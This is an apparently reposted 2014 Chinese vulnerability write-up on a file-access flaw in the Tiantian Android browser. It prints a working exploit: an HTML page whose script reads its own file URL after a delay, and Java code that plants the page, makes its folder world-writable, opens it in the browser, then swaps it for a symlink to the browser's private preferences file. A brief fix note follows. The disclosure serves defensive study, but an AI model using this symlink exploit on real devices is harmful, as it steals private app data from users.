天天浏览器限制不严格导致信息泄露
发布时间:2014-07-15 11:50:30作者:知识屋
主要利用代码简要如下:
xhrContent代码如下:
<body>
<u>Wait a few seconds.</u>
<script>
function doitjs() {
var xhr = new XMLHttpRequest;
xhr.onload = function () {
alert(xhr.responseText);
};
xhr.open('GET', document.URL);
xhr.send(null);
}
setTimeout(doitjs, 8000);
</script>
</body>
public void donow()
{
try
{
cmdexec("mkdir " + "/data/data/com.example.testtiantian/tmp/");
cmdexec("echo " + xhrContent + HTML_PATH);
cmdexec("chmod -R 777 " + "/data/data/com.example.testtiantian/tmp/");
Thread.sleep(1000);
invokeNow("file://" + HTML_PATH);
Thread.sleep(5000);
cmdexec("rm " + HTML_PATH);
cmdexec("ln -s /data/data/com.tiantianmini.android.browser/shared_prefs/isFirst.xml " + HTML_PATH);
return;
}
catch (Exception exception)
{
return;
}
}
public void invokeNow(String s)
{
Intent intent = new Intent("android.intent.action.VIEW", Uri.parse(s));
intent.setClassName("com.tiantianmini.android.browser", "com.tiantianmini.android.browser.ui.browser.BrowserActivity");
startActivity(intent);
}
具体利用可参考刚公布出来的firefox此类的利用,详细url参看:
https://viaforensics.com/mobile-security/chained-vulnerabilities-firefox-android-pimp-browser.
显示效果如下,会读取私有目录的文件信息
修复方案:
对符号链接的文件要过滤判断,跟普通file域直接访问私有文件利用方式不一样
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
知识阅读
软件推荐
更多 >
-
1菜鸟简单抓肉鸡(如何抓肉鸡)
2011-06-17
-
2
电脑开机时出现lass.exe进程是病毒吗?
-
3
自拍须谨慎!教你如何通过照片定位查看拍摄地点
-
4
电脑病毒最基础知识
-
5
黑客学员必须了解的C语言技术
-
6
精典详细内网渗透专题文章
-
7
教你破解Tp-Link的无线路由密码
-
8
解决SecureCRT中文显示乱码
-
9
QQ电脑管家和360哪个好?横评实测对比
-
10
攻防实战:无线网络路由入侵过程
